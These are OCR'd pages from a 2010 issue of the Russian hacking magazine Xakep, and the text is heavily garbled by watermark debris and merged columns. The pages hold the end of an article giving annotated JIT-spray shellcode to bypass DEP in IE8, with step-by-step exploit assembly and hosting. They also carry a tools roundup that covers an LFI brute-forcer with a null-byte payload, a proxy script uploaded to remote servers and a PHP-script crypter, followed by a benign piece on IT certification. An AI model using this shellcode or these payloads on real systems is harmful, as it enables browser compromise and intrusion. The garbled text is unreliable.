книги хакеры / журнал хакер / 136_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Делаем память с шеллкодом исполняемой
0x3c90eA75^ // |
3575eA903c |
jnz short NEXT: |
0x3c904747^ // |
354747903c |
inc edi, inc edi ; два байта |
сдвиг — Unicode |
æ |
|
…// и так далее остальные три буквы
…// Найдя модуль по имени и его базовый адрес
…// Получаем указатели на таблицы с именами и адресами функций
0x3cb89090^ // 359090b83c mov eax, 3c ..
0x3c900000^ |
// |
350000903c |
3500000 |
0x3c9063b0^ |
// |
35b063903c |
mov ah, 'c' |
0x3c5074b4^ // 35b474503c mov al, 't' and push –"ct\0\0"
//заносим в стек по 4 байта "Virt ualP rote ct\0\0"
//затем ищем в списке имен данное имя, как нашли имя, смотрим с этим же индексом адрес функции, получаем
…
0x3c5cc483^ // 3583c45c3c add esp, 5c ; Возвращаемся к адресу шеллкода
0x3c909058^ // 355890903c pop eax ; получаем старшие байты 0x3c08c483^ // 3583c4083c add esp, 08 ;сдвигаемся к младшему адресу
0x3cb9905a^ // 355a90b93c pop edx ; получаем младшие значения
0x3c906060^ // 356060903c 0x3c9060b1^ // 35b160903c
0x3c9060b5^ // 35b560903c заносим в регистр ecx 0x60606060 0x3c90c12b^ // 352bc1903c sub eax, ecx
0x3c90d12b^ // 352bd1903c sub edx, ecx ;младшие восстановили
0x3c04e0c1^ // 35c1e0043c shl eax, 4 ; теперь старшие 0x3c90c203^ // 3503c2903c add eax,edx ; ну и весь адрес 0x3c90388b^ // 358b38903c mov edi, [eax] ; получаем по указателю адрес шеллкода
0x3c08c783^ // 3583c7083c add edi, 8 ; сдвигаемся на 8 байт
0x3c406a54^ // 35546a403c push esp and push 40 ;
подготавливаем параметры. 0x40 — разрешить на чтение, запись и исполнение
0x3c90016a^ // 356a01903c push 01 ; размер не имеет значения
0x3cd3ff57^ // 3557ffd33c вызываем функцию 0x3c90e7ff); // и финальный прыжок на основной шеллкод, уже исполняемый
}
function Loadzz2(){ var ret1 = funcXOR1();}
В комментариях ищи основной смысл, в опкодах же присутствует ещё выравнивание NOP’ами и маскирование XOR’ов. Конечно, данный шеллкод можно вписать в меньшие размеры, но в данном случае значения это не имеет, главное — не набрать кода больше чем 0x1000 = 4000 байт. Наш шеллкод имеет размер около 800 байт, включая NOP’ы, XOR’ы и выравнивания Так что места ещё много. Вот такая история. На диске ты найдешь примеры других шеллкодов и пример эксплойта. К сожалению, мы не успели рассмотреть вариант с точным вычислением адреса JIT шеллкода, тем не менее, и данный вариант будет работать. На диске есть набор для генерации всего что понадобится для обхода защиты DEP в IE8, и вдобавок видео, как этим пользоваться. Вкратце суть следующая:
1.Находим уязвимость.
2.Генерируем в метасплойте шеллкод в формате perl.
3.Сохраняем его, меня модификатор 'my' на 'our'.
3.Генерируем AS файл: perl shellcodegen.pl shellcode_file > jit-spray.as
4.Генерируем SWF файл: as3compiler –X 320 –Y 300 –M Loadzz1 jitspray.as
5.Собираем эксплойт, используя функции из статьи. Так, чтобы после адреса возврата находился адрес, передаваемый через Flash.
6.Закачиваем HTML и SWF на WEB сервер.
Пожалуй, на этом трилогия про атаки на браузеры через ActiveX закончена. Надо заметить, что описанный здесь метод применим не только к IE8, но и к другим браузерам. Аналогичный метод может использоваться в PDF файлах. z
XÀÊÅÐ 05 /136/ 10 |
069 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
||||
|
|
X |
|
|
|
|
|
|
|
||||
|
- |
|
|
|
|
|
|
d |
|
||||
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
i |
|
||
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
|
NOW! |
|
o |
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
to |
BUY |
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
o |
|
||
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
. |
|
|
|
|
|
|
.c |
|
||||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
d |
f |
|
|
n |
e |
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
ВЗЛОМ |
|
|
|
|
|
BUY |
|
|
|||
w Click |
to |
|
|
|
|
|
|||||
Маг icq 884888 |
|
|
|
|
|
m |
|||||
|
|
|
|
|
|
||||||
w |
|
|
|
|
|
|
|
|
|
||
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
X-TOOLS
ПРОГРАММЫ ДЛЯ ХАКЕРОВ
ПРОГРАММА: LIBrute |
Использоватьутилитуоченьпросто. Допустим, |
|
ОС: WINDOWS2000/2003/XP/VISTA/7 |
еслиимеетсяLFI видаhttp://site.com/index. |
|
АВТОР: [X26]VOLAND |
php?page=news&lang=[файл]%00, тоставь |
|
|
следующиенастройки: |
|
|
1. ЦелевойURL: http://site.com/index. |
|
|
php?page=news; |
|
|
2. Метод: GET; |
|
|
3. Имяпеременной: lang; |
|
|
4. Значениепеременной: {STR}%00; |
|
|
5.Способиндикации: поразмерустраницы. |
|
|
Далеенажимайкнопку«Начать»иждирезульта:) |
|
|
Словаридлябрутаберипоссылке: https:// |
|
|
forum.antichat.ru/thread49775.html. |
|
|
ПРОГРАММА: HTTPREQ |
|
интерфейсутилиты |
ОС: WINDOWS2000/2003/XP/ |
|
|
VISTA/7 |
|
Представляютвоемувниманиюнебольшую |
АВТОР: [X26]VOLAND |
|
утилиту, позволяющуюавтоматизироватьпро- |
НаочередиещеоднапрогаотВоланда— |
|
цесспроведенияуязвимостейклассаLocal File |
HttpREQ. |
|
Include, отужеизвестноготебепопредыдущим |
ПрогапозиционируетсякакзаменаInetCrack за |
|
выпускам][ кодера. |
неимениемнекоторогонужногофункционалав |
троянынепройдут! |
Итак, прогаот[x26]VOLAND позволяетподбирать |
последней. |
|
файлынаудаленноймашинепословарюпутем |
Функционалутилитыследующий: |
• пересылкалюбогоколичествафайловвHTTP- |
подстановкилокальногопутивзаданнуюHTTP- |
• GUI-интерфейс; |
запросе; |
переменную. |
• поддержкалюбыхметодовилюбыхзаголовков |
• автоопределениеизаданиепроизвольного |
Возможностипрогивпечатляют: |
запроса; |
MIME-типа; |
• удобныйGUI; |
• поддержкаSSL; |
• сохранениеисторииHTTP-запросов; |
• поддержкаHTTPS; |
• поддержкапрокси; |
• подсвечиваниеимензаголовковответа |
• поддержкапрокси(HTTP/HTTPS); |
• поддержкалюбыхпортов; |
сервера; |
• настройкаавторедиректов; |
• встроенныйURL иDecimal кодировщики; |
• корректнаяобработканулл-байта; |
• возможностьустановкипроизвольныхзаго- |
|
• изменениеразмерашрифтадляполяввода |
ловков; |
|
запроса; |
• возможностьустановкизадержкимежду |
|
• поисктекставтелеответасудобнойподсвет- |
попытками; |
|
кой; |
• возможностьустановкимаксимальногоска- |
|
• сохранениетелаответавфайл; |
чиваемогоразмерастраницы; |
|
• предпросмотртелаответавовстроенном |
• 4 методаатаки(Query String, GET, POST, |
|
браузере; |
COOKIE); |
|
• работачерез.NET Framework > 2.0; |
• возможностьдобавлениявзапросдополни- |
|
Еслиутебяимеютсякакие-топредложенияи |
тельныхпеременных; |
|
пожеланияпоработеHttpREQ, направляйих |
• макросыдляподстановкиименифайла; |
|
прямоавторувтемунаАнтичатеhttps://forum. |
• 2 вариантапроверкинаналичиефайла(по |
|
antichat.ru/thread121239.html. |
поискузаданнойстрокивстраницеипоизме- |
|
|
нениюразмерастраницы); |
использованиеHttpREQ |
|
• режиматакисразунесколькихсайтов; |
|
ПРОГРАММА: WINDOWSUNLOCKER |
• редакторнастроекдляатакуемыхсайтов; |
• индикациядлинывыделенноготекста; |
ОС: WINDOWS2000/2003/XP/ |
• возможностьдетальнойнастройкикаждого |
• удобныйконструктор, автоматизирующий |
VISTA/7 |
сайтавотдельности; |
написаниезапросов; |
АВТОР: DJFLY |
• возможностьзагрузкиспискаатакуемых |
• автоматическийпарсингURL наHost ило- |
Еслитызнакомстрояномwin.lock, который |
сайтовизфайла; |
кальныйадрес; |
дляразблокировкиWindows проситотправить |
• автоматическийпарсингURL; |
• автоматическаявставкадлиныPOST-данных |
SMS наномерNNNN, тонаверняказнаешь, |
• можноиспользоватьсразунесколькословарей; |
(Content-length); |
чтоотнегооченьиоченьсложноизбавиться |
• возможностькодированиязначениявUrl или |
• несколькопредустановленныхвариантов |
(особенноспоявлениемпоследнихверсийэтого |
Hex (дляатакичерезSQL-инъекцию). |
User-Agent; |
«зверька»). |
070 |
|
XÀÊÅÐ 05 /136/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
m |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
запускпроксика
чекерпроксей |
PHP-криптор |
|
Специальнодляизбавленияотданнойнапасти мемберфорумаАсечкиDjFly инаписалпрогу
Windows unlocker.
Прогаможетделатьследующиеполезныевещи:
1.Разблокироватьдиспетчерзадач(затемты можешьвыловитьгадавдиспетчереиубить процесс);
2.Разблокироватькнопку«Пуск»;
3.Разблокироватьпанельзадач;
4.Открыватьпроводник;
5.ОткрыватьIE настраницеантивирусаDrWeb CureIt (исразуначинатьскачивание);
6.Открыватькоманднуюстроку;
7.Сделатьвсеперечисленноеодновременно кнопкой«Разблокироватьвсе»;
8.Просматриватьзапущенныепроцессыи нужныеубивать;
9.Обработканекоторыхкомбинациягорячих клавиш(есликлавиатурабудетзаблокирована трояном);
10.Разблокировкаклавиатуры(дваметода);
11.Встроенноеменю«Выполнить» (замена команднойстроки);
12.Работавтрее;
13.Завершениеработы*.scr файлов;
14.Исправлениеивосстановлениефайлаhosts. Использоватьпрограммуможно, кпримеру, следующимобразом: скидываемееналюбойCD/ DVD/USB носитель, предварительнопереименовавэкзешниквWinUnlocker.exe, исоздаемк нейжеautorun.inf:
[AutoRun]
UseAutoPlay=1
shellexecute=WinUnlocker.exe action=Запустить Windows unlocker action=@WinUnlocker.exe label=Windows unlocker icon=WinUnlocker.exe Shell\cmd1=Запустить Windows unlocker
Shell\cmd1\Command = WinUnlocker.exe
ПРОГРАММА: DICHECKER
ОС: WINDOWS2000/2003/XP/VISTA/7 АВТОР: PROXY-BASE.ORG
Очереднойчекерпроксейнастраницахрубрики. Итак, DiChecker — этомногопоточныйSocks 4/5 иHTTP Proxy-чекер, главнаяфишкакоторого
XÀÊÅÐ 05 /136/ 10
заключаетсяввыставлениитаймаутадля проверки. Чемменьшетаймаут, темшустрее проксик.
Возможностичекера:
•сохранениекаждоготипапроксейвсвойфайл послечека;
•удалениедубликатовизсписка;
•удалениемусораизсписка(пошаблонам);
•опциясменыURL длячека(чекпроксейпод нужныересурсы);
•автосохранениенастроек(потокиитаймаут);
•удобныйинтерфейс.
Всеостальныеподробностиищинаофициаль- номфорумесоздателейчекераproxy-base.org.
ПРОГРАММА: PPROXY
ОС: *NIX/WIN
АВТОР: BONS
Еслипередтобойкогда-либовставалапроблема поискапрокси-сервера, работающегонекакдемонилислужба, аименновконтекстевеб-сер- вера, тосоветуювоспользоватьсязамечательнымнаборомскриптовподназваниемpproxy. Итак, pproxy состоитиздвухчастей: наудаленныйсерверзаливаетсяперваячасть, написаннаянаPHP (pproxy.php), аналокалхостезапускаетсявтораячастьпроксика, реализованнаяна Perl (plocal.pl), котораяибудетпрослушивать порткакHTTP-прокси.
Использоватьпроксидостаточнопросто. Допустим, чтоpproxy.php находитсяпоадресуhttp:// site.com/proxy/pproxy.php, тогдалокальный скриптбудетзапускатьсяследующимобразом (поумолчаниюоткрываетсяпорт8008):
perl plocal.pl -px http://site.com/ proxy/pproxy.php
Построитьцепочкуизпроксейможнотак: име- ютсядвавеб-серверасдвумяскриптамиpproxy. php (http://site1.com/proxy/pproxy.php иhttp:// site2.com/proxy/pproxy.php), тогдалокальный скриптзапускаетсядваразасоследующими параметрами:
perl plocal.pl -px http://site1.com/ proxy/pproxy.php
perl plocal.pl -px http://site2. com/proxy/pproxy.php -tpx http://
localhost:8008 -bp 8009
Далеебраузернастраиваетсяна8009 порти трафикидетпоцепочкеlocalhost Æsite1.com Æ site2.com Ætarget.
Такжевозможноиспользованиескриптовчерез
Tor.
ПривожупримерсTor+Privoxy (поумолчанию порт8118):
perl plocal.pl -px http://site. com/proxy/pproxy.php -tpx http:// localhost:8118
Ещеоднафичазаключаетсявтом, чтопроксик можнозапаролить, установивсвойпассвордв pproxy.php:
$secret = 'pproxypass';
изапустивplocal.pl так:
perl plocal.pl -px http://site.com/ proxy/pproxy.php -pwd pproxypass
Вкомплектесpproxy такжеидетиальтернативныйклиент, написанныйнаDelphi/Pascal с открытымисходнымкодом.
ПРОГРАММА: XXTEACRYPTOR ОС: *NIX/WIN
АВТОР: OZA
XXtea Cryptor — этокрипторphp-скриптов,
которыйможетзашифроватьлюбойphp-скрипт алгоритмомxxtea, азатемbase64.
XXtea — эторасширениешифроалгоритма XTEA, котороебылоопубликованов1998 году ДэвидомВилером. Отличительнойособенностьюалгоритмаявляетсявозможность шифровкиблоковлюбогократного64 битам размера, втовремякакдругиеалгоритмыданногосемействаиспользуютблоки фиксированногоразмера, равногодвумили четырем32-битнымчислам(подробности
ищинаВикипедииhttp://ru.wikipedia.org/wiki/ XXTEA).
Дляиспользованияскриптапростовыбери криптуемыйфайл, имяновогофайлаиключ шифрованиявсоответствующихокнах. z
071
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
СЦЕНА
Мария «Mifrill» Нефедова maria.nefedova@glc.ru
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
СЕРТИФИКАЦИЯ
ТВОИХНАВЫКОВ
ГДЕ,КАКИЗАЧЕМПОЛУЧАТЬ ВСЕЭТИБУМАЖКИ
ЗАЧЕМ ЭТО НУЖНО
Пожалуй, эту статью стоит начать именно с вопроса «а на фига мне это надо?». Сертификация — дело сугубо добровольное, а все мы, как известно, ленивы… В итоге, как
показывает практика, многие недооценивают пользу сертификатов, или вообще о ней не задумываются, полагая, что им хватит диплома о высшем образовании и\или хорошего послужного списка, то есть резюме. Наделеэтонесовсемтак, ведьеслитыокончил тракторныйинститут, этоещенезначит, чтоты можешьуправлятьтрактором. Плюсситуации вжизнибываютразные, таквIT-шнойсреде весьмавеликпроцентгениальныхсамоучек, у которыхзачастуювообщенетдипломововысшемобразовании, илидипломесть, носовсем непрофильный. И, конечно, нестоитзабывать обобратнойсторонеэтоймедали: множество людейсвысшимIT-образованиемедвамогут переставить«Винду», иработодателипрекрасноосведомленыобэтомпечальномфакте. Итак, зачемвообщенужнасертификация? Давайначнемснаиболеесложногопримера: допустим, утебяужеимеетсядипломовысшем образовании, равнокакинеплохоерезюме. Какэтониудивительно, втакойситуациибудет ошибочнополагать, чтоникакиесертификаты тебененужны. Совершеннонепринципиально, собираешьсялитыустраиватьсянаработу,
илиужеимеешьтеплоеместечковхорошей компании, гдеипланируешьподниматьсяпо карьернойлестницесемимильнымишагами. В обоихслучаяхстоитпомнитьотом, чтоспециалистыпоработесперсоналоминачальство смотрятвпервуюочередьнатвойопытина конкретныезнанияиумения. Наличиеже одногоилинесколькихвзаимодополняющих сертификатовдаеттебедополнительныеочки вихглазах, атакжепреимуществопереддругимисоискателями— тынепросто«умеешь», тыподтвержденныйипроверенныйспециа- лист(да-да, поройсертификатможетявляться неплохойзаменойопытуработы, особеннодля начинающегоспециалиста).
Практическианалогичноделообстоитивслучаесужеимеющейсядолжностью— успецас международнымисертификатамикудабольше шансоввозглавитьновыйпроект, принять участиевперспективномисследовании, или простополучитьприбавкукзарплате.
Чтобыутебянесоздалосьневерноговпечатления, замечу, чтосертификат, конечно, непалочка-выручалочка, котораяраспахнет передтобойвседвери. Этолишьдокумент, подтверждающийтвоипрофессиональные знаниявопределенныхобластяхIT — и«вопределенныхобластях» здесьключеваяфраза.
Этонемаловажныйнюанс— нужночувствовать граньразумногоипонимать, чтоподход«авот какойякрутой, уменяесть15 разныхбумажек!»
—неверенвкорне. Нестоитпереводитькачествосертификатоввколичество. Кчеловекус пачкойсертификатоввездеотнесутсясодинаковойнастороженностью, однирешат, чтоты распыляешься, другиемогутдажезадуматься
оподлинностиэтогомножествадокументов. Словом, сертифицироватьсятоженужнос умом, нообэтомречьпойдетниже.
Вомногихслучаяхсертификацияявляется нетолькоподтверждениемтвоихзнаний, но испособомповышенияквалификации, что опять-такисовсемнелишнеедажедлясамых скиллованыхпрофессионалов.
«Стоятьнаместе» иникакнесовершенствоваться, особенновтакойобластикакIT
—верныйспособкарьерногосамоубийства. Многиекомпании-гиганты, имеющиесвои программыпосертификацииспециалистов
(Oracle, Microsoft, Cisco ит.д.), отмечают, чтов ходеподготовкиктестированию, большинство участниковэтихпрограммполучаютновые знанияиприобретаютполезныйопыт. Кслову, наЗападенайтивысокооплачиваемуюработу вкрупнойIT-компании, еслитынесертифицированныйспециалист, практическиневозможно.
Вобщем, какникрути, плюсыотполучения заветнойбумажкиналицо. Каковыминусы— спросишьты? Минусыесть, ноонинеслишком страшны— во-первых, сертификациястоитденег, ипорядоксуммварьируетсяотнесколько
0724 |
XÀÊÅÐ 05 /136/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
сертификатымогутфактическизаменитьтебе диплом, анедополнитьего.
Но, разумеется, обовсемэтомстоитзадумыватьсятольковтомслучае, еслитыищешьв хорошооплачиваемую, интереснуюработу, с возможностьюкарьерногороста.
À ÃÄÅ?
|
|
Первое,чтостоитуяснить,этокакиебывают |
|
|
сертификаты:ониделятсянаобязательные,и |
|
|
необязательные.Первыетребуютсятам,где |
|
|
приходитсяработатьсоборудованиемнесущим |
|
|
повышеннуюопасностьдляжизнедеятельности |
|
|
человека.Такиебумажкикнашейсегодняшней |
|
|
темеопределеннонеотносятся,поэтомунебудем |
|
|
нанихзадерживатьсяиперейдемкнеобязатель- |
|
|
нымсертификатам. |
|
|
Спектрнеобязательныхсертификатовтакширок |
|
|
иразнообразен,чтонеподготовленногочеловека |
|
|
онможетповергнутьвнекоторыйшок.Однаковсе |
|
|
совсемнетакстрашно,каккажется. |
|
|
Наиболеераспространеннаяивызывающаядо- |
|
|
вериесистемасертификациинасегодня,этотак |
сотен, донесколькихтысячмертвыхамери- |
пользутвоихзнаний. В-третьих, ксертифика- |
называемаямеждународнаяIT-сертификация— |
канскихпрезидентов(учти, еслитызавалишь |
циидействительнонужноготовиться:). |
получение«корочек»отсамойкомпании-вендора |
тестнасертификат, деньгитебеневернут). |
Востальном, думаю, тыужеуловилмысльи |
тогоилииногопродукта.Тоесть,лидерамивэтом |
Во-вторых, сертификатыимеютсвойство |
смекнул, чтоеслисертификация— полезный |
областинапротяженииужемногихлетявляются |
устаревать, всежеIT-средастремительнораз- |
ивыгодныйкозырьдажедлякрутыхпрофи, то |
самикомпании-гигантырынка—топовыепроиз- |
виваетсяименяется, такчтосертификат5-7 |
ужпростымсмертнымотнееивовсеслучается |
водителиПО,железаитакдалее(Microsoft,Red |
летнейдавностинесамыйлучшийаргументв |
обширныйprofit. Вопределенныхусловиях |
hat,HP,Cisco,Oracleиижесними). |
XÀÊÅÐ 05 /136/ 10 |
073 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
СЦЕНА
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
РЕКЛАМНЫЕ БУКЛЕТЫ ОТ MS.
СЕРТИФИКАТ ЛИНУКСОЙДА - LPIС LEVEL 2
Ужечувствуешь, чтостановитсяпонятнее? Да, тыдогадываешьсясовершенноверно— сертифицироватьсястоитименновтойвтойобласти, накоторойтысосредоточен, уконкретного вендора. Грубоговоря, еслитывиндузятник— тебеводнусторону, еслилинуксоид— вдругую, аеслидизайнер, такивообщевтретью.
Нежди, чтонайдетсявозможностьполучитьсертификатнекоего«универсального специалиста», ниоднасерьезнаякомпания ничегоподобногонепредоставит, авот узкоспециализированныештукивродеSun Certified Developer For Java Web Services —
это, пожалуйста.
Такжезамечу, чтоонлайновыесертификаты всехмастей, которыхсейчассуществует безумноеколичество, вбольшинствесвоем совершеннобесполезны, поэтомутратить времяиденьгинаэтуглупостьнецелесообразно.
ОтносительножекрупныхIT-шныхвендоров стоитсказатьиещекое-что. Почтилюбой сертификатоттакойкомпаниинесетссобой ималенькие, ноприятныебонусы. Наиболее распространенныеплюшки, этольготныецены напродукциюкомпании(аиногдадажебесплатныедистрибутивыилижелезки), доступк закрытымразделамдля«труспецов», возмож- ностьиспользоватьлогокомпании-вендорана визиткахибланках, именныезначкиствоим «званием», фирменныемагнитики, ручкии другаячепуха.
Конечно, перечислятьвсевозможныенаправ- ленияIT-шнойдеятельности, сихмногочисленныминюансамииответвлениями, мыне станем— нельзяобъятьнеобъятное. Вместо этогопредставляемтебекраткуюсводкупо топовымпрограммамсертификациинасегодняшнийдень.
MICROSOFT
